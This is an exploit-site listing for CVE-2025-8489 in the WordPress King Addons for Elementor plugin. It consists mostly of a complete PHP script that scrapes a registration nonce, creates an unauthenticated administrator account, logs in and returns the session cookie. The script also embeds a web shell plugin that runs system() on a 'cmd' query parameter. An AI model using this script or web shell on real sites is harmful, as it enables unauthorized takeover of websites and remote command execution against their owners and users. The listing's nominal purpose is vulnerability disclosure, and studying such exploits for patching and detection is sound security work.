Share
## https://sploitus.com/exploit?id=PACKETSTORM:216362
=============================================================================================================================================
| # Title : WordPress King Addons for Elementor 24.12.92 to 51.1.14 Unauthenticated Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://wordpress.org/plugins/king-addons/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212728/ & CVE-2025-8489
[+] Summary : The vulnerability exists in the handle_register_ajax() function within the King Addons plugin.
This function improperly handles user registration without proper authorization checks, allowing attackers to specify the user_role parameter during registration.
[+] Attack Vector :
Unauthenticated Registration: Attackers can register new users without authentication
Role Manipulation: The user_role parameter can be set to "administrator"
Nonce Requirement: Requires a valid nonce exposed on pages containing the "Login Register Form" widget
[+] POC :
php poc.php https://vulnerable-site.com /register-page/ \
--username indoushka \
--password P@ssw0rd123! \
--email indoushka4ever@gmail.com
<?php
class WordPressKingAddonsExploit {
private $targetUrl;
private $username;
private $password;
private $email;
private $noncePage;
private $cookieJar = [];
public function __construct($targetUrl, $noncePage, $username, $password, $email) {
$this->targetUrl = rtrim($targetUrl, '/');
$this->noncePage = $noncePage;
$this->username = $username;
$this->password = $password;
$this->email = $email;
}
/**
* تنفيذ الاستغلال
*/
public function exploit() {
echo "[*] Starting exploit for CVE-2025-8489\n";
// الخطوة 1: البحث عن nonce
echo "[*] Searching for nonce on page: {$this->noncePage}\n";
$nonce = $this->findNonce();
if (!$nonce) {
echo "[-] Failed to find nonce\n";
return false;
}
echo "[+] Found nonce: $nonce\n";
// الخطوة 2: إنشاء مستخدم بصلاحيات مدير
echo "[*] Creating administrator account\n";
$userCreated = $this->createAdminUser($nonce);
if (!$userCreated) {
echo "[-] Failed to create administrator account\n";
return false;
}
echo "[+] Administrator account created\n";
echo "[*] Username: {$this->username}\n";
echo "[*] Password: {$this->password}\n";
// الخطوة 3: تسجيل الدخول كمدير
echo "[*] Logging in as administrator\n";
$adminCookie = $this->wordpressLogin();
if (!$adminCookie) {
echo "[-] Failed to login as administrator\n";
return false;
}
echo "[+] Successfully logged in\n";
return [
'username' => $this->username,
'password' => $this->password,
'cookie' => $adminCookie
];
}
/**
* البحث عن nonce في الصفحة المحددة
*/
private function findNonce() {
$url = $this->targetUrl . '/' . ltrim($this->noncePage, '/');
$html = $this->httpGet($url);
if (!$html) {
return null;
}
// البحث عن nonce في JavaScript
preg_match('/king_addons_login_register_vars\s*=\s*({[^;]+})/', $html, $matches);
if (isset($matches[1])) {
$jsonStr = str_replace('\/', '/', $matches[1]);
$data = json_decode($jsonStr, true);
if (isset($data['register_nonce']) && !empty($data['register_nonce'])) {
return $data['register_nonce'];
}
}
return null;
}
/**
* إنشاء مستخدم بصلاحيات مدير
*/
private function createAdminUser($nonce) {
$ajaxUrl = $this->targetUrl . '/wp-admin/admin-ajax.php';
$postData = [
'action' => 'king_addons_user_register',
'nonce' => $nonce,
'username' => $this->username,
'email' => $this->email,
'password' => $this->password,
'confirm_password' => $this->password,
'user_role' => 'administrator',
'terms_required' => 'no'
];
$response = $this->httpPost($ajaxUrl, $postData);
if (!$response) {
return false;
}
$json = json_decode($response, true);
if (isset($json['success']) && $json['success'] === true) {
return true;
}
// التحقق إذا كان المستخدم موجوداً مسبقاً
if (isset($json['success']) && $json['success'] === false) {
$errorMsg = isset($json['data']['message']) ? $json['data']['message'] : '';
if (preg_match('/(already exists|username.*taken|user.*exists)/i', $errorMsg)) {
echo "[!] User already exists, attempting to use existing account\n";
return true;
}
}
return false;
}
/**
* تسجيل الدخول إلى ووردبريس
*/
private function wordpressLogin() {
$loginUrl = $this->targetUrl . '/wp-login.php';
$postData = [
'log' => $this->username,
'pwd' => $this->password,
'wp-submit' => 'Log In',
'redirect_to' => $this->targetUrl . '/wp-admin/',
'testcookie' => '1'
];
$headers = [
'Content-Type: application/x-www-form-urlencoded',
'Referer: ' . $loginUrl
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $loginUrl);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
$response = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($httpCode === 200 || $httpCode === 302) {
// استخراج الكوكيز
preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $response, $matches);
$cookies = [];
foreach($matches[1] as $item) {
parse_str($item, $cookie);
$cookies = array_merge($cookies, $cookie);
}
// بناء سلسلة الكوكيز
$cookieStr = '';
foreach($cookies as $key => $value) {
$cookieStr .= "$key=$value; ";
}
// التحقق من الصلاحيات
$adminUrl = $this->targetUrl . '/wp-admin/';
$adminPage = $this->httpGet($adminUrl, $cookieStr);
if (strpos($adminPage, 'wp-admin-bar') !== false) {
return $cookieStr;
}
}
return false;
}
/**
* رفع وتنفيذ ملف اختراق (Proof of Concept فقط)
*/
public function uploadMaliciousPlugin($adminCookie) {
echo "[*] Warning: This function demonstrates file upload capability\n";
echo "[*] For educational purposes only!\n";
// هذا مجرد مثال توضيحي
$pluginContent = '<?php
/**
* Plugin Name: Malicious Demo
* Description: Proof of Concept - DO NOT USE IN PRODUCTION
*/
if (isset($_GET["cmd"]) && current_user_can("administrator")) {
system($_GET["cmd"]);
}
?>';
// Note: Actual plugin upload requires more complex implementation
// involving ZIP creation and WordPress upload mechanisms
return false;
}
/**
* طلب HTTP GET
*/
private function httpGet($url, $cookie = '') {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
if ($cookie) {
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
}
$response = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return ($httpCode == 200) ? $response : false;
}
/**
* طلب HTTP POST
*/
private function httpPost($url, $data, $cookie = '') {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
if ($cookie) {
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
}
$response = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return ($httpCode == 200) ? $response : false;
}
}
/**
* واجهة سطر الأوامر (CLI)
*/
if (php_sapi_name() === 'cli') {
echo "=== WordPress King Addons Exploit (CVE-2025-8489) ===\n\n";
if ($argc < 3) {
echo "Usage: php " . basename(__FILE__) . " [target_url] [nonce_page_path]\n";
echo "Example: php exploit.php https://example.com /page-with-form/\n\n";
echo "Optional parameters:\n";
echo " --username [username] (default: random)\n";
echo " --password [password] (default: random)\n";
echo " --email [email] (default: random)\n";
exit(1);
}
$targetUrl = $argv[1];
$noncePage = $argv[2];
// القيم الافتراضية
$username = 'admin_' . substr(md5(time()), 0, 8);
$password = substr(md5(time()), 0, 12);
$email = substr(md5(time()), 0, 8) . '@example.com';
// معالجة الوسائط الإضافية
for ($i = 3; $i < $argc; $i++) {
if ($argv[$i] === '--username' && isset($argv[$i+1])) {
$username = $argv[++$i];
} elseif ($argv[$i] === '--password' && isset($argv[$i+1])) {
$password = $argv[++$i];
} elseif ($argv[$i] === '--email' && isset($argv[$i+1])) {
$email = $argv[++$i];
}
}
// تنفيذ الاستغلال
$exploit = new WordPressKingAddonsExploit($targetUrl, $noncePage, $username, $password, $email);
$result = $exploit->exploit();
if ($result) {
echo "\n[+] Exploit successful!\n";
echo "[+] Administrator credentials:\n";
echo " URL: " . $targetUrl . "/wp-admin/\n";
echo " Username: " . $result['username'] . "\n";
echo " Password: " . $result['password'] . "\n";
echo "\n[!] Important: Remove the created user after testing!\n";
} else {
echo "\n[-] Exploit failed\n";
}
} else {
echo "This script is intended for command line use.\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================